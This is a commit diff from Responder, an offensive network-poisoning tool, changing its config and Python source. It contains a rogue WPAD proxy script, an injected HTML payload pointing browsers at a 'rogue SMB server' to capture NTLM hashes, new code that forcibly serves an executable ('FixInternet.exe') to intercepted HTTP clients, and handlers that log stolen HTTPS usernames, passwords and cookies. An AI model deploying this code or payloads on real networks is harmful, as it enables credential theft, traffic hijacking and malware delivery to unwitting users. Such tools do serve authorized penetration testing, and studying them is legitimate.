Fixed serve-always and serve-exe with the new WPAD server.

2025-08-19 13:00:00 -07:00 · 2014-08-26 02:51:00 -04:00 · 2014-08-26 02:51:00 -04:00 · cf7b4771ca
commit cf7b4771ca
parent f69e93c02e
2 changed files with 26 additions and 10 deletions
--- a/Responder.conf
+++ b/Responder.conf
@ -45,10 +45,8 @@ ExecFilename = FixInternet.exe
 WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
 ;
 ;HTML answer to inject.
-;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.
+;In this example, we redirect the browser to our rogue SMB server. Please consider the "RespProxySrv" string when modifying, it is used in conjunction with WPADScript so no proxy will be used for this host.Also, the HTML has to be in this format "<html> Payload goes here...</html>".
 ;Also, the HTML has to be in this format "<html> Payload goes here...</html>".
 HTMLToServe = <html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico' alt='Loading' height='1' width='2'></body></html> 
 ;
 [HTTPS Server]
 ;
 ;Change to use your certs
--- a/Responder.py
+++ b/Responder.py
@ -79,6 +79,7 @@ Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
 Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
 FILENAME = config.get('HTTP Server', 'Filename')
 WPAD_Script = config.get('HTTP Server', 'WPADScript')
 HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
 RespondTo = config.get('Responder Core', 'RespondTo').strip()
 RespondTo.split(",")
 RespondToName = config.get('Responder Core', 'RespondToName').strip()
@ -96,6 +97,9 @@ Verbose = options.Verbose
 Force_WPAD_Auth = options.Force_WPAD_Auth
 AnalyzeMode = options.Analyse
 if HTMLToServe == None:
    HTMLToServe = ''
 if INTERFACE != "Not set":
    BIND_TO_Interface = INTERFACE
@ -1617,7 +1621,6 @@ def Basic_Ntlm(Basic):
 def ServeEXE(data,client, Filename):
    Message = "[+]Sent %s file sent to: %s."%(Filename,client)
    print Message
    logging.warning(Message)
    with open (Filename, "rb") as bk:
        data = bk.read()
@ -1704,7 +1707,7 @@ def PacketSequence(data,client):
                buffer1 = WpadCustom(data,client)
                return buffer1
            else:
-                buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
+                buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
                buffer1.calculate()
                return str(buffer1)
@ -1724,7 +1727,7 @@ def PacketSequence(data,client):
            buffer1 = WpadCustom(data,client)
            return buffer1
        else:
-            buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
+            buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
            buffer1.calculate()
            return str(buffer1)
@ -1778,8 +1781,21 @@ def HandleGzip(Headers, Content, Payload):
    else:
        return False
 def InjectPage(data, client):
    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
        if IsExecutable(FILENAME):
            buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
            buffer1.calculate()
            return str(buffer1)
        else:
            buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
            buffer1.calculate()
            return str(buffer1)
    else:
        return False
 def InjectData(data):
-    Payload = config.get('HTTP Server','HTMLToServe')
+    Payload = HTMLToServe
    if len(data.split('\r\n\r\n'))>1:
        try:
            Headers, Content = data.split('\r\n\r\n')
@ -1906,8 +1922,10 @@ class ProxyHandler (BaseHTTPServer.BaseHTTPRequestHandler):
                    if i is soc:
                        out = self.connection
                        try:
-                            if len(config.get('HTTP Server','HTMLToServe'))>5:
+                            if len(HTMLToServe)>5:
                                data = InjectData(i.recv(8192))
                            if InjectPage(i.recv(8192),self.client_address[0]):
                                data = InjectPage(i.recv(8192),self.client_address[0])
                            else:
                                data = i.recv(8192)
                        except:
@ -2011,7 +2029,7 @@ def HTTPSPacketSequence(data,client):
        if packetNtlm == "\x03":
            NTLM_Auth= b64decode(''.join(a))
            ParseHTTPSHash(NTLM_Auth,client)
-            buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
+            buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
            return buffer1
    if b:
        GrabCookie(data,client)
@ -2019,7 +2037,7 @@ def HTTPSPacketSequence(data,client):
        WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
        print "[+]HTTPS-User & Password:", b64decode(''.join(b))
        logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
-        buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
+        buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
        return buffer1
    else: